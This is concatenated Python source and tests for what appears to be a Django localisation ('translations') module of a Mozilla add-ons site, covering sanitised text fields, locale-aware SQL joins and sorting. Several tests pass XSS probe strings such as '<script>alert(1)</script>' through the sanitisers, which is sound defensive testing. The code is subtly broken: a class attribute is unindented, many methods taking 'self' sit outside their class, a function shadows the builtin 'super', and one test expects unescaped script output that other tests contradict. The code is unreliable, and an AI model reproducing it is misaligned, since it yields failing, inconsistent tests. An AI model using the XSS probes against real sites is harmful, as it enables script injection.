        return bleach.clean(emptied, tags=tags, strip=True)
class NoLinksTranslation(NoLinksMixin, PurifiedTranslation):
    """Run the string through bleach, escape markup and strip all the links."""
    # Inherits PurifiedTranslation's rich allowed_tags, minus links.

    class Meta:
        proxy = True
class NoLinksNoMarkupTranslation(NoLinksMixin, LinkifiedTranslation):
    """Run the string through bleach, escape markup and strip all the links."""
    # LinkifiedTranslation only allows <a>, so nothing but plain text remains.

    class Meta:
        proxy = True
class TranslationSequence(models.Model):
    """
    The translations_seq table, so syncdb will create it during testing.

    Single-row sequence used by Translation.new() to mint shared ids.
    """
    id = models.IntegerField(primary_key=True)

    class Meta:
        db_table = 'translations_seq'
def delete_translation(obj, fieldname):
    """Null out obj's translation FK, then delete the backing rows."""
    field = obj._meta.get_field(fieldname)
    trans_id = getattr(obj, field.attname)
    # Clear the FK first so the object never points at deleted rows.
    obj.update(**{field.name: None})
    if trans_id:
        Translation.objects.filter(id=trans_id).delete()
########NEW FILE########
__FILENAME__ = query
import itertools
from django.conf import settings
from django.db import models
from django.utils import translation as translation_utils
import addons.query
def order_by_translation(qs, fieldname):
    """
    Order the QuerySet by the translated field, honoring the current and
    fallback locales. Returns a new QuerySet.

    The model being sorted needs a get_fallback() classmethod that describes
    the fallback locale. get_fallback() can return a string or a Field.
    """
    # A leading '-' requests descending order, as in regular order_by().
    if fieldname.startswith('-'):
        desc = True
        fieldname = fieldname[1:]
    else:
        desc = False

    qs = qs.all()
    model = qs.model
    field = model._meta.get_field(fieldname)

    # connection is a tuple (lhs, table, join_cols)
    connection = (model._meta.db_table, field.rel.to._meta.db_table,
                  field.rel.field_name)

    # Doing the manual joins is flying under Django's radar, so we need to make
    # sure the initial alias (the main table) is set up.
    if not qs.query.tables:
        qs.query.get_initial_alias()

    # Force two new (reuse is an empty set) LEFT OUTER JOINs against the
    # translation table, without reusing any aliases. We'll hook up the
    # language fallbacks later.
    qs.query = qs.query.clone(TranslationQuery)
    t1 = qs.query.join(connection, join_field=field,
                       outer_if_first=True, reuse=set())
    t2 = qs.query.join(connection, join_field=field,
                       outer_if_first=True, reuse=set())
    qs.query.translation_aliases = {field: (t1, t2)}

    # t1 carries the active locale, t2 the fallback; IFNULL picks the
    # first one that actually has a row.
    f1, f2 = '%s.`localized_string`' % t1, '%s.`localized_string`' % t2
    name = 'translated_%s' % field.column
    ifnull = 'IFNULL(%s, %s)' % (f1, f2)
    prefix = '-' if desc else ''
    return qs.extra(select={name: ifnull},
                    where=['(%s IS NOT NULL OR %s IS NOT NULL)' % (f1, f2)],
                    order_by=[prefix + name])
class TranslationQuery(addons.query.IndexQuery):
    """
    Overrides sql.Query to hit our special compiler that knows how to JOIN
    translations.
    """

    def clone(self, klass=None, **kwargs):
        # Maintain translation_aliases across clones.
        cloned = super(TranslationQuery, self).clone(klass, **kwargs)
        cloned.translation_aliases = self.translation_aliases
        return cloned

    def get_compiler(self, using=None, connection=None):
        # Let the parent resolve using/connection, then swap in our compiler.
        parent = super(TranslationQuery, self).get_compiler(using, connection)
        return SQLCompiler(self, parent.connection, parent.using)
class SQLCompiler(addons.query.IndexCompiler):
    """Overrides get_from_clause to LEFT JOIN translations with a locale."""

    def get_from_clause(self):
        # Temporarily remove translation tables from query.tables so Django
        # doesn't create joins against them.
        old_tables = list(self.query.tables)
        for table in itertools.chain(*self.query.translation_aliases.values()):
            self.query.tables.remove(table)
        joins, params = super(SQLCompiler, self).get_from_clause()
        # The first appended param fills the %s placeholder of the
        # current-locale join; the second (if any) fills the fallback join.
        # fallback could be a string locale or a model field.
        params.append(translation_utils.get_language())
        if hasattr(self.query.model, 'get_fallback'):
            fallback = self.query.model.get_fallback()
        else:
            fallback = settings.LANGUAGE_CODE
        if not isinstance(fallback, models.Field):
            params.append(fallback)
        # Add our locale-aware joins. We're not respecting the table ordering
        # Django had in query.tables, but that seems to be ok.
        for field, aliases in self.query.translation_aliases.items():
            t1, t2 = aliases
            joins.append(self.join_with_locale(t1))
            joins.append(self.join_with_locale(t2, fallback))
        self.query.tables = old_tables
        return joins, params

    def join_with_locale(self, alias, fallback=None):
        # This is all lifted from the real sql.compiler.get_from_clause(),
        # except for the extra AND clause. Fun project: fix Django to use Q
        # objects here instead of a bunch of strings.
        qn = self.quote_name_unless_alias
        qn2 = self.connection.ops.quote_name
        mapping = self.query.alias_map[alias]
        # name, alias, join_type, lhs, lhs_col, col, nullable = mapping
        name, alias, join_type, lhs, join_cols, _, join_field = mapping
        lhs_col = join_field.column
        rhs_col = join_cols
        alias_str = '' if alias == name else (' %s' % alias)
        # A Field fallback compares against a column on the main table;
        # otherwise a plain %s placeholder is filled from params.
        if isinstance(fallback, models.Field):
            fallback_str = '%s.%s' % (qn(self.query.model._meta.db_table),
                                      qn(fallback.column))
        else:
            fallback_str = '%s'
        return ('%s %s%s ON (%s.%s = %s.%s AND %s.%s = %s)' %
                (join_type, qn(name), alias_str,
                 qn(lhs), qn2(lhs_col), qn(alias), qn2(rhs_col),
                 qn(alias), qn('locale'), fallback_str))
########NEW FILE########
__FILENAME__ = models
from django.db import models
import amo.models
from translations.fields import (LinkifiedField, PurifiedField, save_signal,
TranslatedField)
class TranslatedModel(amo.models.ModelBase):
    """Test model exercising the TranslatedField variants."""
    name = TranslatedField()
    description = TranslatedField()
    default_locale = models.CharField(max_length=10)
    # require_locale=False makes the field optional in every locale.
    no_locale = TranslatedField(require_locale=False)


# Flush queued translations whenever a TranslatedModel is saved.
models.signals.pre_save.connect(save_signal, sender=TranslatedModel,
                                dispatch_uid='testapp_translatedmodel')
class UntranslatedModel(amo.models.ModelBase):
    """Make sure nothing is broken when a model doesn't have translations."""
    # Deliberately contains no TranslatedField at all.
    number = models.IntegerField()
class FancyModel(amo.models.ModelBase):
    """Mix it up with purified and linkified fields."""
    purified = PurifiedField()
    linkified = LinkifiedField()


# Flush queued translations whenever a FancyModel is saved.
models.signals.pre_save.connect(save_signal, sender=FancyModel,
                                dispatch_uid='testapp_fancymodel')
########NEW FILE########
__FILENAME__ = test_forms
from pyquery import PyQuery as pq
from nose.tools import eq_
from django.forms import ModelForm
import amo.tests
from translations import forms, fields
from translations.tests.testapp.models import TranslatedModel
class TestForm(forms.TranslationFormMixin, ModelForm):
    """Minimal form exercising the translation mixin's locale plumbing."""
    name = fields.TransField()

    class Meta:
        model = TranslatedModel
class TestTranslationFormMixin(amo.tests.TestCase):

    def test_default_locale(self):
        obj = TranslatedModel()
        # get_fallback() drives the default locale picked up by the mixin.
        obj.get_fallback = lambda: 'pl'

        f = TestForm(instance=obj)
        eq_(f.fields['name'].default_locale, 'pl')
        eq_(f.fields['name'].widget.default_locale, 'pl')
        # The rendered widgets carry the locale in their lang attribute.
        eq_(pq(f.as_p())('input:not([lang=init])').attr('lang'), 'pl')
########NEW FILE########
__FILENAME__ = test_helpers
from django.conf import settings
from django.utils import translation
import jingo
from mock import Mock, patch
from nose.tools import eq_
import amo
import amo.tests
from addons.models import Addon
from translations import helpers
from translations.fields import save_signal
from translations.models import PurifiedTranslation
from translations.tests.testapp.models import TranslatedModel
def super():
    # NOTE(review): this function shadows the builtin ``super``.  It only
    # loads the template helpers, which looks like a nose module-level setup
    # hook, so it was presumably meant to be named ``setup()`` -- confirm
    # before renaming in case something references it by this name.
    jingo.load_helpers()
def test_locale_html():
    """Test HTML attributes for languages different than the site language"""
    # The Mock stands in for a translated-field value exposing .locale.
    testfield = Mock()

    # same language: no need for attributes
    this_lang = translation.get_language()
    testfield.locale = this_lang
    s = helpers.locale_html(testfield)
    assert not s, 'no special HTML attributes for site language'

    # non-rtl language
    testfield.locale = 'de'
    s = helpers.locale_html(testfield)
    eq_(s, ' lang="de" dir="ltr"')

    # rtl language
    for lang in settings.RTL_LANGUAGES:
        testfield.locale = lang
        s = helpers.locale_html(testfield)
        eq_(s, ' lang="%s" dir="rtl"' % testfield.locale)
def test_locale_html_xss():
    """Test for nastiness-removal in the transfield's locale"""
    testfield = Mock()

    # A malicious locale must be escaped, never emitted verbatim.
    testfield.locale = '<script>alert(1)</script>'
    s = helpers.locale_html(testfield)
    assert '<script>' not in s
    # locale_html runs the locale through jinja2.escape, so the escaped form
    # must appear.  (Asserting the *raw* form here would directly contradict
    # the previous assertion and could never pass.)
    assert '&lt;script&gt;alert(1)&lt;/script&gt;' in s
def test_empty_locale_html():
    """locale_html must still work if field is None."""
    assert not helpers.locale_html(None), 'locale_html on None must be empty.'
def test_truncate_purified_field():
    """Truncation that already fits must leave the markup intact."""
    s = '<i>one</i><i>two</i>'
    t = PurifiedTranslation(localized_string=s)
    actual = jingo.env.from_string('{{ s|truncate(6) }}').render({'s': t})
    eq_(actual, s)
def test_truncate_purified_field_xss():
    """Truncating should not introduce xss issues."""
    s = 'safe <script>alert("omg")</script>'
    t = PurifiedTranslation(localized_string=s)
    actual = jingo.env.from_string('{{ s|truncate(100) }}').render({'s': t})
    # PurifiedTranslation escapes the disallowed <script> tag, so the
    # rendered output must contain the escaped form, not the raw markup.
    eq_(actual, 'safe &lt;script&gt;alert("omg")&lt;/script&gt;')
    actual = jingo.env.from_string('{{ s|truncate(5) }}').render({'s': t})
    eq_(actual, 'safe ...')
def test_clean():
    # Links are not mangled, bad HTML is escaped, newlines are slimmed.
    s = '<ul><li><a href="#woo">\n\nyeah</a></li>\n\n<li><script></li></ul>'
    # bleach escapes the disallowed <script> tag, so the expected output
    # must contain the escaped entity form.
    eq_(helpers.clean(s),
        '<ul><li><a href="#woo">\n\nyeah</a></li><li>&lt;script&gt;</li></ul>')
def test_clean_in_template():
    # Round-trip: already-clean markup passes through the filter untouched.
    s = '<a href="#woo">yeah</a>'
    eq_(jingo.env.from_string('{{ s|clean }}').render({'s': s}), s)
def test_no_links():
    """no_links strips anchors and broken markup but keeps the inner text."""
    s = 'a <a href="http://url.link">http://example.com</a>, http://text.link'
    eq_(jingo.env.from_string('{{ s|no_links }}').render({'s': s}),
        'a http://example.com, http://text.link')

    # Bad markup.
    s = '<http://bad.markup.com'
    eq_(jingo.env.from_string('{{ s|no_links }}').render({'s': s}), '')

    # Bad markup.
    s = 'some text <http://bad.markup.com'
    eq_(jingo.env.from_string('{{ s|no_links }}').render({'s': s}),
        'some text')
def test_l10n_menu():
    """The menu must expose the right remove-locale URL to the template."""
    # No remove_locale_url provided.
    menu = helpers.l10n_menu({})
    assert 'data-rm-locale=""' in menu, menu

    # Specific remove_locale_url provided (eg for user).
    menu = helpers.l10n_menu({}, remove_locale_url='/some/url/')
    assert 'data-rm-locale="/some/url/"' in menu, menu

    # Use the remove_locale_url taken from the addon in the context.
    menu = helpers.l10n_menu({'addon': Addon()},
                             remove_locale_url='some/url/')
    assert 'data-rm-locale="/developers/addon/None/rmlocale"' in menu, menu
@patch.object(settings, 'AMO_LANGUAGES', ('de', 'en-US', 'es', 'fr', 'pt-BR'))
class TestAllLocales(amo.tests.TestCase):
    """Tests for the all_locales template filter."""

    def test_all_locales_none(self):
        # No addon at all: the filter bails out with None.
        addon = None
        field_name = 'description'
        eq_(helpers.all_locales(addon, field_name), None)

        # Addon missing the requested field: None as well.
        addon = Mock()
        field_name = 'description'
        del addon.description
        eq_(helpers.all_locales(addon, field_name), None)

    def test_all_locales(self):
        obj = TranslatedModel()
        obj.description = {
            'en-US': 'There',
            'es': 'Is No',
            'fr': 'Spoon'
        }
        # Pretend the TranslateModel instance was saved to force Translation
        # objects to be saved.
        save_signal(sender=TranslatedModel, instance=obj)

        result = helpers.all_locales(obj, 'description')
        assert u'<div class="trans" data-name="description">' in result
        assert u'<span lang="en-us">There</span>' in result
        assert u'<span lang="es">Is No</span>' in result
        assert u'<span lang="fr">Spoon</span>' in result

    def test_all_locales_empty(self):
        obj = TranslatedModel()
        obj.description = {
            'en-US': 'There',
            'es': 'Is No',
            'fr': ''
        }
        # Pretend the TranslateModel instance was saved to force Translation
        # objects to be saved.
        save_signal(sender=TranslatedModel, instance=obj)

        result = helpers.all_locales(obj, 'description')
        assert u'<div class="trans" data-name="description">' in result
        assert u'<span lang="en-us">There</span>' in result
        assert u'<span lang="es">Is No</span>' in result
        assert u'<span lang="fr"></span>' in result

        # prettify_empty renders empty strings as a styled "None" span.
        result = helpers.all_locales(obj, 'description', prettify_empty=True)
        assert u'<div class="trans" data-name="description">' in result
        assert u'<span lang="en-us">There</span>' in result
        assert u'<span lang="es">Is No</span>' in result
        assert u'<span class="empty" lang="fr">None</span>' in result
########NEW FILE########
__FILENAME__ = test_models
# -*- coding: utf-8 -*-
from contextlib import nested
import django
from django.conf import settings
from django.db import connections, reset_queries
from django.test.utils import override_settings
from django.utils import translation
from django.utils.functional import lazy
import jinja2
import multidb
from mock import patch
from nose import SkipTest
from nose.tools import eq_
from test_utils import trans_eq, TestCase
from testapp.models import TranslatedModel, UntranslatedModel, FancyModel
from translations import widgets
from translations.query import order_by_translation
from translations.models import (LinkifiedTranslation, NoLinksTranslation,
NoLinksNoMarkupTranslation,
PurifiedTranslation, Translation,
TranslationSequence)
def ids(qs):
    """Collect the ``id`` attribute of every object in the queryset."""
    return [obj.id for obj in qs]
class TranslationFixturelessTestCase(TestCase):
    "We want to be able to rollback stuff."

    def test_whitespace(self):
        # Translation.save() strips surrounding whitespace via clean().
        t = Translation(localized_string=' khaaaaaan! ', id=999)
        t.save()
        eq_('khaaaaaan!', t.localized_string)
class TranslationSequenceTestCase(TestCase):
    """
    Make sure automatic translation sequence generation works
    as expected.
    """

    def test_empty_translations_seq(self):
        """Make sure we can handle an empty translation sequence table."""
        TranslationSequence.objects.all().delete()
        newtrans = Translation.new('abc', 'en-us')
        newtrans.save()
        assert newtrans.id > 0, (
            'Empty translation table should still generate an ID.')

    def test_single_translation_sequence(self):
        """Make sure we only ever have one translation sequence."""
        TranslationSequence.objects.all().delete()
        eq_(TranslationSequence.objects.count(), 0)
        # Each new Translation reuses the single sequence row.
        for i in range(5):
            newtrans = Translation.new(str(i), 'en-us')
            newtrans.save()
            eq_(TranslationSequence.objects.count(), 1)

    def test_translation_sequence_increases(self):
        """Make sure translation sequence increases monotonically."""
        newtrans1 = Translation.new('abc', 'en-us')
        newtrans1.save()
        newtrans2 = Translation.new('def', 'de')
        newtrans2.save()
        assert newtrans2.pk > newtrans1.pk, (
            'Translation sequence needs to keep increasing.')
class TranslationTestCase(TestCase):
fixtures = ['testapp/test_models.json']
    def setUp(self):
        super(TranslationTestCase, self).setUp()
        # Stash the redirect settings so tearDown can restore them.
        self.redirect_url = settings.REDIRECT_URL
        self.redirect_secret_key = settings.REDIRECT_SECRET_KEY
        settings.REDIRECT_URL = None
        settings.REDIRECT_SECRET_KEY = 'sekrit'
        translation.activate('en-US')

    def tearDown(self):
        super(TranslationTestCase, self).tearDown()
        # Restore the settings mutated in setUp.
        settings.REDIRECT_URL = self.redirect_url
        settings.REDIRECT_SECRET_KEY = self.redirect_secret_key
    def test_meta_translated_fields(self):
        # Models without translations don't grow the attribute at all.
        assert not hasattr(UntranslatedModel._meta, 'translated_fields')

        eq_(set(TranslatedModel._meta.translated_fields),
            set([TranslatedModel._meta.get_field('no_locale'),
                 TranslatedModel._meta.get_field('name'),
                 TranslatedModel._meta.get_field('description')]))

        eq_(set(FancyModel._meta.translated_fields),
            set([FancyModel._meta.get_field('purified'),
                 FancyModel._meta.get_field('linkified')]))
    def test_fetch_translations(self):
        """Basic check of fetching translations in the current locale."""
        o = TranslatedModel.objects.get(id=1)
        trans_eq(o.name, 'some name', 'en-US')
        trans_eq(o.description, 'some description', 'en-US')

    def test_fetch_no_translations(self):
        """Make sure models with no translations aren't harmed."""
        o = UntranslatedModel.objects.get(id=1)
        eq_(o.number, 17)

    def test_fetch_translation_de_locale(self):
        """Check that locale fallbacks work."""
        try:
            translation.activate('de')
            o = TranslatedModel.objects.get(id=1)
            # 'de' has a name; description falls back to en-US.
            trans_eq(o.name, 'German!! (unst unst)', 'de')
            trans_eq(o.description, 'some description', 'en-US')
        finally:
            translation.deactivate()
    def test_create_translation(self):
        o = TranslatedModel.objects.create(name='english name')
        get_model = lambda: TranslatedModel.objects.get(id=o.id)
        trans_eq(o.name, 'english name', 'en-US')
        eq_(o.description, None)

        # Make sure the translation id is stored on the model, not the autoid.
        eq_(o.name.id, o.name_id)

        # Check that a different locale creates a new row with the same id.
        translation.activate('de')
        german = get_model()
        trans_eq(o.name, 'english name', 'en-US')

        german.name = u'Gemütlichkeit name'
        german.description = u'clöüserw description'
        german.save()

        trans_eq(german.name, u'Gemütlichkeit name', 'de')
        trans_eq(german.description, u'clöüserw description', 'de')

        # ids should be the same, autoids are different.
        eq_(o.name.id, german.name.id)
        assert o.name.autoid != german.name.autoid

        # Check that de finds the right translation.
        fresh_german = get_model()
        trans_eq(fresh_german.name, u'Gemütlichkeit name', 'de')
        trans_eq(fresh_german.description, u'clöüserw description', 'de')

        # Check that en-US has the right translations.
        translation.deactivate()
        english = get_model()
        trans_eq(english.name, 'english name', 'en-US')
        # NOTE(review): `debug` looks like a leftover debugging toggle on the
        # instance; it does not appear to affect the assertions -- confirm.
        english.debug = True
        eq_(english.description, None)

        english.description = 'english description'
        english.save()

        fresh_english = get_model()
        trans_eq(fresh_english.description, 'english description', 'en-US')
        eq_(fresh_english.description.id, fresh_german.description.id)

    def test_update_translation(self):
        o = TranslatedModel.objects.get(id=1)
        translation_id = o.name.autoid

        o.name = 'new name'
        o.save()

        o = TranslatedModel.objects.get(id=1)
        trans_eq(o.name, 'new name', 'en-US')
        # Make sure it was an update, not an insert.
        eq_(o.name.autoid, translation_id)
    def test_create_with_dict(self):
        # Set translations with a dict.
        strings = {'en-US': 'right language', 'de': 'wrong language'}
        o = TranslatedModel.objects.create(name=strings)

        # Make sure we get the English text since we're in en-US.
        trans_eq(o.name, 'right language', 'en-US')

        # Check that de was set.
        translation.activate('de')
        o = TranslatedModel.objects.get(id=o.id)
        trans_eq(o.name, 'wrong language', 'de')

        # We're in de scope, so we should see the de text.
        de = TranslatedModel.objects.create(name=strings)
        trans_eq(o.name, 'wrong language', 'de')

        # Make sure en-US was still set.
        translation.deactivate()
        o = TranslatedModel.objects.get(id=de.id)
        trans_eq(o.name, 'right language', 'en-US')

    def test_update_with_dict(self):
        # There's existing en-US and de strings.
        strings = {'de': None, 'fr': 'oui'}
        get_model = lambda: TranslatedModel.objects.get(id=1)

        # Don't try checking that the model's name value is en-US. It will be
        # one of the other locales, but we don't know which one. You just set
        # the name to a dict, deal with it.
        m = get_model()
        m.name = strings
        m.save()

        # en-US was not touched.
        trans_eq(get_model().name, 'some name', 'en-US')

        # de was updated to NULL, so it falls back to en-US.
        translation.activate('de')
        trans_eq(get_model().name, 'some name', 'en-US')

        # fr was added.
        translation.activate('fr')
        trans_eq(get_model().name, 'oui', 'fr')

    def test_dict_with_hidden_locale(self):
        # Hidden locales are still stored, just not shown in the UI.
        with self.settings(HIDDEN_LANGUAGES=('xxx',)):
            o = TranslatedModel.objects.get(id=1)
            o.name = {'en-US': 'active language', 'xxx': 'hidden language',
                      'de': 'another language'}
            o.save()
        ts = Translation.objects.filter(id=o.name_id)
        eq_(sorted(ts.values_list('locale', flat=True)),
            ['de', 'en-US', 'xxx'])

    def test_dict_bad_locale(self):
        m = TranslatedModel.objects.get(id=1)
        m.name = {'de': 'oof', 'xxx': 'bam', 'es': 'si'}
        m.save()

        ts = Translation.objects.filter(id=m.name_id)
        # 'xxx' is not a valid locale here, so it's dropped; en-US pre-exists.
        eq_(sorted(ts.values_list('locale', flat=True)),
            ['de', 'en-US', 'es'])
def test_sorting(self):
    """Test translation comparisons in Python code."""
    b = Translation.new('bbbb', 'de')
    a = Translation.new('aaaa', 'de')
    c = Translation.new('cccc', 'de')
    eq_(sorted([c, a, b]), [a, b, c])

def test_sorting_en(self):
    # Expected row ids when ordering by the en-US 'name' translation.
    q = TranslatedModel.objects.all()
    expected = [4, 1, 3]

    eq_(ids(order_by_translation(q, 'name')), expected)
    eq_(ids(order_by_translation(q, '-name')), list(reversed(expected)))

def test_sorting_mixed(self):
    # With 'de' active the ordering changes for rows that have a de string.
    translation.activate('de')
    q = TranslatedModel.objects.all()
    expected = [1, 4, 3]

    eq_(ids(order_by_translation(q, 'name')), expected)
    eq_(ids(order_by_translation(q, '-name')), list(reversed(expected)))

def test_sorting_by_field(self):
    # The fallback may be a model field (default_locale) instead of a
    # fixed locale string; patch get_fallback to exercise that path.
    field = TranslatedModel._meta.get_field('default_locale')
    TranslatedModel.get_fallback = classmethod(lambda cls: field)

    translation.activate('de')
    q = TranslatedModel.objects.all()
    expected = [3, 1, 4]

    eq_(ids(order_by_translation(q, 'name')), expected)
    eq_(ids(order_by_translation(q, '-name')), list(reversed(expected)))

    # Undo the monkeypatch so other tests aren't affected.
    del TranslatedModel.get_fallback
def test_new_purified_field(self):
    # This is not a full test of the html sanitizing. We expect the
    # underlying bleach library to have full tests.
    s = '<a id=xx href="http://xxx.com">yay</a> <i>http://yyy.com</i>'
    m = FancyModel.objects.create(purified=s)
    eq_(m.purified.localized_string_clean,
        '<a rel="nofollow" href="http://xxx.com">yay</a> '
        '<i><a rel="nofollow" href="http://yyy.com">'
        'http://yyy.com</a></i>')
    # The raw string is stored untouched alongside the cleaned copy.
    eq_(m.purified.localized_string, s)

def test_new_linkified_field(self):
    s = '<a id=xx href="http://xxx.com">yay</a> <i>http://yyy.com</i>'
    m = FancyModel.objects.create(linkified=s)
    eq_(m.linkified.localized_string_clean,
        '<a rel="nofollow" href="http://xxx.com">yay</a> '
        '<i><a rel="nofollow" href="http://yyy.com">'
        'http://yyy.com</a></i>')
    eq_(m.linkified.localized_string, s)

def test_update_purified_field(self):
    # Updating an existing purified field re-runs the cleaning.
    m = FancyModel.objects.get(id=1)
    s = '<a id=xx href="http://xxx.com">yay</a> <i>http://yyy.com</i>'
    m.purified = s
    m.save()
    eq_(m.purified.localized_string_clean,
        '<a rel="nofollow" href="http://xxx.com">yay</a> '
        '<i><a rel="nofollow" href="http://yyy.com">'
        'http://yyy.com</a></i>')
    eq_(m.purified.localized_string, s)

def test_update_linkified_field(self):
    m = FancyModel.objects.get(id=1)
    s = '<a id=xx href="http://xxx.com">yay</a> <i>http://yyy.com</i>'
    m.linkified = s
    m.save()
    eq_(m.linkified.localized_string_clean,
        '<a rel="nofollow" href="http://xxx.com">yay</a> '
        '<i><a rel="nofollow" href="http://yyy.com">'
        'http://yyy.com</a></i>')
    eq_(m.linkified.localized_string, s)
def test_purified_field_str(self):
    # Stringifying a purified field yields the cleaned markup.
    m = FancyModel.objects.get(id=1)
    eq_(u'%s' % m.purified,
        '<i>x</i> '
        '<a rel="nofollow" href="http://yyy.com">http://yyy.com</a>')

def test_linkified_field_str(self):
    m = FancyModel.objects.get(id=1)
    eq_(u'%s' % m.linkified,
        '<i>x</i> '
        '<a rel="nofollow" href="http://yyy.com">http://yyy.com</a>')

def test_purifed_linkified_fields_in_template(self):
    # Rendering through Jinja2 should use the cleaned strings as-is.
    m = FancyModel.objects.get(id=1)
    env = jinja2.Environment()
    t = env.from_string('{{ m.purified }}=={{ m.linkified }}')
    s = t.render({'m': m})
    eq_(s, u'%s==%s' % (m.purified.localized_string_clean,
                        m.linkified.localized_string_clean))
def test_outgoing_url(self):
    """
    Make sure linkified field is properly bounced off our outgoing URL
    redirector.
    """
    settings.REDIRECT_URL = 'http://example.com/'

    s = 'I like http://example.org/awesomepage.html .'
    m = FancyModel.objects.create(linkified=s)
    # The cleaned string routes the link through REDIRECT_URL with a
    # signature segment; the original string is kept untouched.
    eq_(m.linkified.localized_string_clean,
        'I like <a rel="nofollow" href="http://example.com/'
        '40979175e3ef6d7a9081085f3b99f2f05447b22ba790130517dd62b7ee59ef94/'
        'http%3A//example.org/'
        'awesomepage.html">http://example.org/awesomepage'
        '.html</a> .')
    eq_(m.linkified.localized_string, s)
def test_require_locale(self):
    # A field with require_locale=False keeps whatever single locale its
    # translation was stored with, regardless of the active locale.
    obj = TranslatedModel.objects.get(id=1)
    eq_(unicode(obj.no_locale), 'blammo')
    eq_(obj.no_locale.locale, 'en-US')

    # Switch the translation to a locale we wouldn't pick up by default.
    obj.no_locale.locale = 'fr'
    obj.no_locale.save()

    obj = TranslatedModel.objects.get(id=1)
    eq_(unicode(obj.no_locale), 'blammo')
    eq_(obj.no_locale.locale, 'fr')
def test_delete_set_null(self):
    """
    Test that deleting a translation sets the corresponding FK to NULL,
    if it was the only translation for this field.
    """
    obj = TranslatedModel.objects.get(id=1)
    trans_id = obj.description.id
    eq_(Translation.objects.filter(id=trans_id).count(), 1)

    obj.description.delete()

    obj = TranslatedModel.objects.no_cache().get(id=1)
    eq_(obj.description_id, None)
    eq_(obj.description, None)
    eq_(Translation.objects.no_cache().filter(id=trans_id).exists(), False)

@patch.object(TranslatedModel, 'get_fallback', create=True)
def test_delete_keep_other_translations(self, get_fallback):
    """Deleting one locale keeps the other locales and the FK intact."""
    # To make sure both translations for the name are used, set the
    # fallback to the second locale, which is 'de'.
    get_fallback.return_value = 'de'

    obj = TranslatedModel.objects.get(id=1)

    orig_name_id = obj.name.id
    eq_(obj.name.locale.lower(), 'en-us')
    eq_(Translation.objects.filter(id=orig_name_id).count(), 2)

    obj.name.delete()

    obj = TranslatedModel.objects.no_cache().get(id=1)
    eq_(Translation.objects.no_cache().filter(id=orig_name_id).count(), 1)

    # We shouldn't have set name_id to None.
    eq_(obj.name_id, orig_name_id)

    # We should find a Translation.
    eq_(obj.name.id, orig_name_id)
    eq_(obj.name.locale, 'de')
class TranslationMultiDbTests(TestCase):
    """Check which database connection translation queries go through when
    several (master/slave) databases are configured."""
    fixtures = ['testapp/test_models.json']

    def setUp(self):
        super(TranslationMultiDbTests, self).setUp()
        translation.activate('en-US')

    def tearDown(self):
        self.cleanup_fake_connections()
        super(TranslationMultiDbTests, self).tearDown()

    @property
    def mocked_dbs(self):
        # Two fake slaves aliasing the default DB, so we can count which
        # connection each query actually used.
        return {
            'default': settings.DATABASES['default'],
            'slave-1': settings.DATABASES['default'].copy(),
            'slave-2': settings.DATABASES['default'].copy(),
        }

    def cleanup_fake_connections(self):
        with patch.object(django.db.connections, 'databases', self.mocked_dbs):
            for key in ('default', 'slave-1', 'slave-2'):
                connections[key].close()

    @override_settings(DEBUG=True)
    def test_translations_queries(self):
        # Make sure we are in a clean environment.
        reset_queries()
        TranslatedModel.objects.get(pk=1)
        eq_(len(connections['default'].queries), 3)

    @override_settings(DEBUG=True)
    def test_translations_reading_from_multiple_db(self):
        with patch.object(django.db.connections, 'databases', self.mocked_dbs):
            # Make sure we are in a clean environment.
            reset_queries()

            with patch('multidb.get_slave', lambda: 'slave-2'):
                TranslatedModel.objects.get(pk=1)
                eq_(len(connections['default'].queries), 0)
                eq_(len(connections['slave-1'].queries), 0)
                eq_(len(connections['slave-2'].queries), 3)

    @override_settings(DEBUG=True)
    def test_translations_reading_from_multiple_db_using(self):
        raise SkipTest('Will need a django-queryset-transform patch to work')
        with patch.object(django.db.connections, 'databases', self.mocked_dbs):
            # Make sure we are in a clean environment.
            reset_queries()

            with patch('multidb.get_slave', lambda: 'slave-2'):
                TranslatedModel.objects.using('slave-1').get(pk=1)
                eq_(len(connections['default'].queries), 0)
                eq_(len(connections['slave-1'].queries), 3)
                eq_(len(connections['slave-2'].queries), 0)

    @override_settings(DEBUG=True)
    def test_translations_reading_from_multiple_db_pinning(self):
        with patch.object(django.db.connections, 'databases', self.mocked_dbs):
            # Make sure we are in a clean environment.
            reset_queries()

            # Pinning to master forces everything through 'default'.
            with nested(patch('multidb.get_slave', lambda: 'slave-2'),
                        multidb.pinning.use_master):
                TranslatedModel.objects.get(pk=1)
                eq_(len(connections['default'].queries), 3)
                eq_(len(connections['slave-1'].queries), 0)
                eq_(len(connections['slave-2'].queries), 0)
class PurifiedTranslationTest(TestCase):
    """Sanitizing behaviour of PurifiedTranslation.__html__()."""

    def test_output(self):
        assert isinstance(PurifiedTranslation().__html__(), unicode)

    def test_raw_text(self):
        s = u' This is some text '
        x = PurifiedTranslation(localized_string=s)
        eq_(x.__html__(), 'This is some text')

    def test_allowed_tags(self):
        s = u'<b>bold text</b> or <code>code</code>'
        x = PurifiedTranslation(localized_string=s)
        eq_(x.__html__(), u'<b>bold text</b> or <code>code</code>')

    def test_forbidden_tags(self):
        # Disallowed tags come back entity-escaped, not stripped.
        s = u'<script>some naughty xss</script>'
        x = PurifiedTranslation(localized_string=s)
        eq_(x.__html__(), '<script>some naughty xss</script>')

    def test_internal_link(self):
        s = u'<b>markup</b> <a href="http://addons.mozilla.org/foo">bar</a>'
        x = PurifiedTranslation(localized_string=s)
        eq_(x.__html__(),
            u'<b>markup</b> <a rel="nofollow" '
            u'href="http://addons.mozilla.org/foo">bar</a>')

    @patch('amo.urlresolvers.get_outgoing_url')
    def test_external_link(self, get_outgoing_url_mock):
        # External hrefs are bounced through the outgoing URL redirector.
        get_outgoing_url_mock.return_value = 'http://external.url'
        s = u'<b>markup</b> <a href="http://example.com">bar</a>'
        x = PurifiedTranslation(localized_string=s)
        eq_(x.__html__(),
            u'<b>markup</b> <a rel="nofollow" '
            u'href="http://external.url">bar</a>')

    @patch('amo.urlresolvers.get_outgoing_url')
    def test_external_text_link(self, get_outgoing_url_mock):
        # Bare text URLs get linkified and bounced too.
        get_outgoing_url_mock.return_value = 'http://external.url'
        s = u'<b>markup</b> http://example.com'
        x = PurifiedTranslation(localized_string=s)
        eq_(x.__html__(),
            u'<b>markup</b> <a rel="nofollow" '
            u'href="http://external.url">http://example.com</a>')
class LinkifiedTranslationTest(TestCase):
    """LinkifiedTranslation allows links only; all other markup is escaped."""

    @patch('amo.urlresolvers.get_outgoing_url')
    def test_allowed_tags(self, get_outgoing_url_mock):
        get_outgoing_url_mock.return_value = 'http://external.url'
